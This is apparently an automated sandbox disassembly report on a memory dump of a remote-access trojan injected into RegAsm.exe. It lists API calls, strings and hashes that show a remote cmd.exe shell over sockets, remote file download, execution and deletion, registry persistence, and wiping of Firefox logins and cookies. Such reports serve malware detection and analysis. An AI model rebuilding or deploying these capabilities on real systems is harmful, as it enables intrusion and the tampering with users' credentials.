                                  • SetLastError.KERNEL32(00000000), ref: 0043C706
                                  • SetLastError.KERNEL32(00000000), ref: 0043C70F
                                  Strings
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0043C69C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 3170660625-1068371695
                                  • Opcode ID: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
                                  • Instruction ID: bc4159b708f5a4293034d87da73aa0aa4050a2000ac7bf9c59918bad1b3ef628
                                  • Opcode Fuzzy Hash: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
                                  • Instruction Fuzzy Hash: E101DB7554460167861167766CCAD6B175AABDA3A9F20202BFD15B2292EB6CCC01431D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 867 40d202-40d219 RegCreateKeyA 868 40d252 867->868 869 40d21b-40d250 call 402020 call 402028 RegSetValueExA RegCloseKey 867->869 870 40d254-40d262 call 402091 868->870 869->870
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
                                  • RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D239
                                  • RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.2.0 Light), ref: 0040D244
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: 5.2.0 Light
                                  • API String ID: 1818849710-1277417835
                                  • Opcode ID: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
                                  • Instruction ID: ebd1829d961e48a05cccc46ad5987234d1f606a9772c4a5001abe3e09c24b449
                                  • Opcode Fuzzy Hash: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
                                  • Instruction Fuzzy Hash: 8FF0F632800108FBCB00AFA0DD05EEE776CEF04304F10417ABE09A6091D6359E08DA58

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 877 40cf8c-40cfab RegOpenKeyExA 878 40cfad-40cfcd RegQueryValueExA RegCloseKey 877->878 879 40cfcf 877->879 880 40cfd1-40cfd5 878->880 879->880
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,time,?,?,0040931D,time), ref: 0040CFA3
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040931D,time), ref: 0040CFB7
                                  • RegCloseKey.KERNEL32(?,?,?,0040931D,time), ref: 0040CFC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: time
                                  • API String ID: 3677997916-1872009285
                                  • Opcode ID: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
                                  • Instruction ID: 01e9e4454c5815cd9fe83fd72c8224fe9163c15e3a8ae46bcaeb397ef7d6e021
                                  • Opcode Fuzzy Hash: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
                                  • Instruction Fuzzy Hash: FDE06D36901238FBDB204BA29D4DDEB7F6DDF477A4F010265BD08A2151D2354E10E6E5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 881 40d033-40d05f RegOpenKeyExA 882 40d061-40d089 RegQueryValueExA RegCloseKey 881->882 883 40d094 881->883 884 40d096 882->884 885 40d08b-40d092 882->885 883->884 886 40d09b-40d0a7 call 402178 884->886 885->886
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0040D057
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0040D074
                                  • RegCloseKey.KERNEL32(?), ref: 0040D07F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
                                  • Instruction ID: d1556b6a21c4095f6825b550070d3a1ea107f6ab0172e99dcae801f88fb81ba0
                                  • Opcode Fuzzy Hash: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
                                  • Instruction Fuzzy Hash: A301A27A900128BBCB209B91DC48DEFBB7DDB85354F000166BB09B3140DA348E1A97A8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 889 40cfd6-40cffe RegOpenKeyExA 890 40d000-40d02b RegQueryValueExA RegCloseKey 889->890 891 40d02d 889->891 892 40d02f-40d032 890->892 891->892
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
                                  • RegCloseKey.KERNEL32(?), ref: 0040D01F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 70b0dd12e2a5ac5965a0120e69f62f08b290a07ebd25e271949baf3e135a97bd
                                  • Instruction ID: fb118fa7efbfe96847db450d91ab692ef4bc3c1656726d9dc2d007ede4cac492
                                  • Opcode Fuzzy Hash: 70b0dd12e2a5ac5965a0120e69f62f08b290a07ebd25e271949baf3e135a97bd
                                  • Instruction Fuzzy Hash: F2F01D76D00218BFDF109FE09C05FEE7BBCEB05714F1041A5FA08E6191D6355A159B94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 900 40d310-40d326 RegCreateKeyA 901 40d352 900->901 902 40d328-40d350 RegSetValueExA RegCloseKey 900->902 903 40d354-40d357 901->903 902->903
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D31E
                                  • RegSetValueExA.KERNEL32(?,00000004,00000000,00000004,?,00000004,?,?,?,00408639,00459A08,00000001), ref: 0040D339
                                  • RegCloseKey.ADVAPI32(?,?,?,?,00408639,00459A08,00000001), ref: 0040D344
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID:
                                  • API String ID: 1818849710-0
                                  • Opcode ID: 83e19b0ee784d6d7dd655aae5b191897494fea023ec0ff9c5dc0952b7e1e2595
                                  • Instruction ID: 70c1ac6059dc5b3d9a0709b10961866a60481b6b1b62c8df2f439cbbf28fa7e5
                                  • Opcode Fuzzy Hash: 83e19b0ee784d6d7dd655aae5b191897494fea023ec0ff9c5dc0952b7e1e2595
                                  • Instruction Fuzzy Hash: F7E06D76900208FBDF109FE09C06FEA7B6CEF05B54F104165BF08A7190D2359E18E7A9
                                  APIs
                                  • _free.LIBCMT ref: 0043B648
                                    • Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                  • RtlReAllocateHeap.NTDLL(00000000,00000048,00426BC1,00426BC2,00000006,?,0042A8FC,C985C35D,00000006,004274BC,00426BC2,00000008,004278A7,00000008,00426BC2,00427818), ref: 0043B684
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocAllocate_free
                                  • String ID:
                                  • API String ID: 2447670028-0
                                  • Opcode ID: c49c117e4ca7361ac0314f882396d4a2d3c3e32dd118628cb6b083a4c3ef1095
                                  • Instruction ID: fe16a153650bf957c02c75a4bda108abfe66e8103c26be9158aaf2df18b8f7a5
                                  • Opcode Fuzzy Hash: c49c117e4ca7361ac0314f882396d4a2d3c3e32dd118628cb6b083a4c3ef1095
                                  • Instruction Fuzzy Hash: 81F0C83160060466DB212B26AC07F6B3758DFD9774F14612BFB14662A2EF2CD80185DF
                                  APIs
                                  • socket.WS2_32(?,00000001,00000006), ref: 00401698
                                  • CreateEventW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001,00000000,?,0040157C), ref: 004016D4
                                    • Part of subcall function 004016E4: WSAStartup.WS2_32(00000202,00000000), ref: 004016F9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventStartupsocket
                                  • String ID:
                                  • API String ID: 1953588214-0
                                  • Opcode ID: 36e7bfa51ce044c78e083c68398fd1d69a647d25f0744323a0148b4db47791e7
                                  • Instruction ID: ee37118afe77b65253b8e33a0694ca72e24623c2f1becaa2fb2072e3896651ba
                                  • Opcode Fuzzy Hash: 36e7bfa51ce044c78e083c68398fd1d69a647d25f0744323a0148b4db47791e7
                                  • Instruction Fuzzy Hash: CF017171404B809FD7358F79A8856867FE0AB16304F084E6EF4D693BA1D3B1A841CF19
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040A324,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 004087FE
                                  • GetLastError.KERNEL32 ref: 00408804
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateErrorLastMutex
                                  • String ID:
                                  • API String ID: 1925916568-0
                                  • Opcode ID: ad70dbe040568da7a8bf80a41bb3d92e4cc7e949328fb993af6de4085ac2e67a
                                  • Instruction ID: d80e09737745f7bf6ee3eddf50bc73956995b70806c11dd9ed117efe7a266b7c
                                  • Opcode Fuzzy Hash: ad70dbe040568da7a8bf80a41bb3d92e4cc7e949328fb993af6de4085ac2e67a
                                  • Instruction Fuzzy Hash: 26C08C787942005BE70923609D8EB2C2440EB48707F10807AF203D40D0CBD48840852A
                                  APIs
                                    • Part of subcall function 0041EE6D: recv.WS2_32(?,?,?,?), ref: 0041EE78
                                  • WSAGetLastError.WS2_32 ref: 0041EDB7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastrecv
                                  • String ID:
                                  • API String ID: 2514157807-0
                                  • Opcode ID: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                  • Instruction ID: faf68b5ff96845e0976cbf32cc890fde9b2ffc12f7c1b339871521fb39d3c049
                                  • Opcode Fuzzy Hash: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                  • Instruction Fuzzy Hash: FCF0A43920C1165BDF18A55AFC948F933569B49334B30472BFD39825F0DA2998D11109
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0043C6C9,00000001,00000364,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043AFD6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ac73287723b5aced0c8671368978bbe2700735a34e1e8d5040177b1074273be0
                                  • Instruction ID: a7c765c1dc6197512c48bfc0f123c91e67cad64699951c3927080ceb2c5ec14d
                                  • Opcode Fuzzy Hash: ac73287723b5aced0c8671368978bbe2700735a34e1e8d5040177b1074273be0
                                  • Instruction Fuzzy Hash: 26F0597168462467DF246B23CD01E5F7748AF497B0F246123F898A7280EB38DC2186AF
                                  APIs
                                    • Part of subcall function 0041EE86: send.WS2_32(?,?,?,?), ref: 0041EE91
                                  • WSAGetLastError.WS2_32 ref: 0041EE28
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastsend
                                  • String ID:
                                  • API String ID: 1802528911-0
                                  • Opcode ID: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                  • Instruction ID: 51c8cce08e66605cdbda4daed835d51d1109a6a45c2cb2692f3426c1110deaf5
                                  • Opcode Fuzzy Hash: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                  • Instruction Fuzzy Hash: BEF0963E20C3169ADE28995BE8548BA33519F49330F30471BFE3A866F0DA2868D05549
                                  APIs
                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004016F9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: e34561341bad9807c6dd234660dab736b0286262fa41f7e127d06ca5525ce80d
                                  • Instruction ID: 255de9a7584d5d18edeb06657e72cc98f651a1ca3ec2e3fd9487ec56659a492e
                                  • Opcode Fuzzy Hash: e34561341bad9807c6dd234660dab736b0286262fa41f7e127d06ca5525ce80d
                                  • Instruction Fuzzy Hash: 4BD0123395864C4ED610AFB9AC0F9A4775CD313611F0003BAADB5835D6F640161CC7EB
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 8a8e9804f9c3fec9da3b4e7b1d1b68e1412d2ed44d6014824d00f4b511832df7
                                  • Instruction ID: 219120072e52f96b3a762e6ed3faccd779c965bd914e66b4b009d712158f5d27
                                  • Opcode Fuzzy Hash: 8a8e9804f9c3fec9da3b4e7b1d1b68e1412d2ed44d6014824d00f4b511832df7
                                  • Instruction Fuzzy Hash: A0C04C79104108BB9B051BA19C0CD797B69D749651B00C425B90555150D577991196A5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountEventTick
                                  • String ID: }F$PowrProf.dll$SetSuspendState$X|F$hlight
                                  • API String ID: 180926312-747135334
                                  • Opcode ID: bd791beb00660d74d78a248b85cbe22f1df0740ae6a73fc17567db0fc55dc88d
                                  • Instruction ID: 98c374b66c36bac6561f19394a83ab35c3f0051b20c4d30e97aa66e57c35150d
                                  • Opcode Fuzzy Hash: bd791beb00660d74d78a248b85cbe22f1df0740ae6a73fc17567db0fc55dc88d
                                  • Instruction Fuzzy Hash: B452D53161430067C615FB72CC5AAAE369A9F90709F00493FF646B71D2EEBC8A49C75E
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 0040513C
                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 0040520A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040522C
                                    • Part of subcall function 00414795: FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
                                    • Part of subcall function 00414795: FindNextFileW.KERNEL32(00000000,?), ref: 00414863
                                    • Part of subcall function 00414795: RemoveDirectoryW.KERNEL32(?), ref: 004148DD
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                    • Part of subcall function 004018E7: WaitForSingleObject.KERNEL32(?,00000000,?,00000008,00000004,00000000,0000000C,00000000), ref: 0040196B
                                    • Part of subcall function 004018E7: SetEvent.KERNEL32(?), ref: 00401999
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405619
                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004056FA
                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00405946
                                  • DeleteFileA.KERNEL32(?), ref: 00405AD4
                                    • Part of subcall function 00405C8E: __EH_prolog.LIBCMT ref: 00405C93
                                    • Part of subcall function 00405C8E: FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
                                    • Part of subcall function 00405C8E: __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
                                    • Part of subcall function 00405C8E: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
                                  • Sleep.KERNEL32(000007D0), ref: 00405B7A
                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00405BBC
                                    • Part of subcall function 00414D7F: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Find$AttributesDeleteEventFirstNext$DirectoryDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersRemoveShellSingleSleepStringsSystemThrowTimeWaitsend
                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$X|F$open
                                  • API String ID: 577278831-3555090288
                                  • Opcode ID: 96227b8e189f7fdcadea00c127325455557f538216e4e652d0f401818db13fc1
                                  • Instruction ID: 248697d8118448b10e373b0070428f50d3d60723a4b6fa8bdee278dac68b1eb1
                                  • Opcode Fuzzy Hash: 96227b8e189f7fdcadea00c127325455557f538216e4e652d0f401818db13fc1
                                  • Instruction Fuzzy Hash: 2942AF716143006BC604FB76CD5B9AF76A9AF91308F40093FF646671D2EE7C9A0C879A
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 00403B5D
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  • __Init_thread_footer.LIBCMT ref: 00403B9A
                                  • CreatePipe.KERNEL32(004697C4,004697AC,004696D0,00000000,004595AC,00000000), ref: 00403C28
                                  • CreatePipe.KERNEL32(004697B0,004697CC,004696D0,00000000), ref: 00403C42
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,004696E0,004697B4), ref: 00403CB8
                                  • Sleep.KERNEL32(0000012C), ref: 00403D0F
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403D32
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00403D5C
                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00467D08,004595B0), ref: 00403E5C
                                    • Part of subcall function 0042BE7E: __onexit.LIBCMT ref: 0042BE84
                                  • Sleep.KERNEL32(00000064), ref: 00403E78
                                  • TerminateProcess.KERNEL32(00000000), ref: 00403E91
                                  • CloseHandle.KERNEL32 ref: 00403E9D
                                  • CloseHandle.KERNEL32 ref: 00403EA5
                                  • CloseHandle.KERNEL32 ref: 00403EB7
                                  • CloseHandle.KERNEL32 ref: 00403EBF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                  • String ID: SystemDrive$cmd.exe
                                  • API String ID: 2994406822-3633465311
                                  • Opcode ID: a2e0625ca6f411f7efb066e01ea8d05623e5cf75442ca6f623990c6e8f78e4cc
                                  • Instruction ID: f800c9f0f2bf78fedcc34e7f916c989ee22e489b26dcc0f87d11f274eef4dc79
                                  • Opcode Fuzzy Hash: a2e0625ca6f411f7efb066e01ea8d05623e5cf75442ca6f623990c6e8f78e4cc
                                  • Instruction Fuzzy Hash: 9B919071A10214EBDB01AFA5ED469AD3B6DEB44706B04003BF501B72E1EBF95E04CB9E
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040805D
                                  • FindClose.KERNEL32(00000000), ref: 00408077
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 004081AE
                                  • FindClose.KERNEL32(00000000), ref: 004081D4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 1164774033-3681987949
                                  • Opcode ID: 71a3758c9da8e09f58d85f82c6f0c0c7b393f4ae15ed837ff10422e77743f24a
                                  • Instruction ID: 77c5650d51b0fe3478d1e8891f5765647e4bb1e207f3f9250e523ff0b76e5811
                                  • Opcode Fuzzy Hash: 71a3758c9da8e09f58d85f82c6f0c0c7b393f4ae15ed837ff10422e77743f24a
                                  • Instruction Fuzzy Hash: 205193309101199ECB14FB71DE5ADEEB734AF21308F10017FE646761D2EFB85A4ACA59
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 00408271
                                  • FindClose.KERNEL32(00000000), ref: 00408287
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 004082B1
                                  • DeleteFileA.KERNEL32(00000000,00000000), ref: 00408359
                                  • GetLastError.KERNEL32 ref: 00408363
                                  • FindNextFileA.KERNEL32(00000000,00000010), ref: 00408377
                                  • FindClose.KERNEL32(00000000), ref: 0040839D
                                  • FindClose.KERNEL32(00000000), ref: 004083BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 532992503-432212279
                                  • Opcode ID: 3969a7a6a5acbe83f6a9b0f1ee1c88604edab17d60d8180c022af7f0b181ac56
                                  • Instruction ID: 00a5acec732576bc5cbb70c497211a5f1a220084e487e38eff3f49032b11243d
                                  • Opcode Fuzzy Hash: 3969a7a6a5acbe83f6a9b0f1ee1c88604edab17d60d8180c022af7f0b181ac56
                                  • Instruction Fuzzy Hash: F941C6309002159ACB14FB75DD5A9EEB734AF51704F5000BFF946B21C2EF7C4A89C699
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0$1$2$3$4$5$6$7
                                  • API String ID: 0-3177665633
                                  • Opcode ID: 1777e788168ca64476a4a3adf89150e5c85b8ad296c37a0fb6fbfb00c5940eff
                                  • Instruction ID: d49e1bb01a71b31e9a514e8ab9d79bfde0f8a8990e09ce8f733d3f3a0fa78d10
                                  • Opcode Fuzzy Hash: 1777e788168ca64476a4a3adf89150e5c85b8ad296c37a0fb6fbfb00c5940eff
                                  • Instruction Fuzzy Hash: E271F2B05083029ED315EF21C9A6FAB7794AF44310F10492FF692A72D1DAB89D8DC75B
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00468490), ref: 00412EAD
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,004129B7), ref: 00412EF4
                                  • GetLastError.KERNEL32 ref: 00412F02
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,004129B7), ref: 00412F33
                                  • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,0045F170,00000000,0045F170,00000000,0045F170), ref: 00413003
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                  • String ID:
                                  • API String ID: 2247270020-0
                                  • Opcode ID: 2cc3bf881d0ae6e0524c004e94dd5b10cceb50f847b089947975b433809224c4
                                  • Instruction ID: 67645d11a30bc640d3fdd44f05f185ca840b8eb7349b3fd14ad573a0dba1d346
                                  • Opcode Fuzzy Hash: 2cc3bf881d0ae6e0524c004e94dd5b10cceb50f847b089947975b433809224c4
                                  • Instruction Fuzzy Hash: BD815B31D00119ABCB19EFA1DC569EEB738AF14309F20802AF50677191EF786F49CB68
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00414863
                                  • RemoveDirectoryW.KERNEL32(?), ref: 004148DD
                                  • FindClose.KERNEL32(00000000), ref: 0041490B
                                  • RemoveDirectoryW.KERNEL32(?), ref: 00414914
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00414931
                                  • DeleteFileW.KERNEL32(?), ref: 0041493E
                                  • GetLastError.KERNEL32 ref: 00414966
                                  • FindClose.KERNEL32(00000000), ref: 00414979
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 2341273852-0
                                  • Opcode ID: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
                                  • Instruction ID: 67d1b46c084ba7a1db363377ae0973eb7806ada5b67af0ef92577c41b38a644f
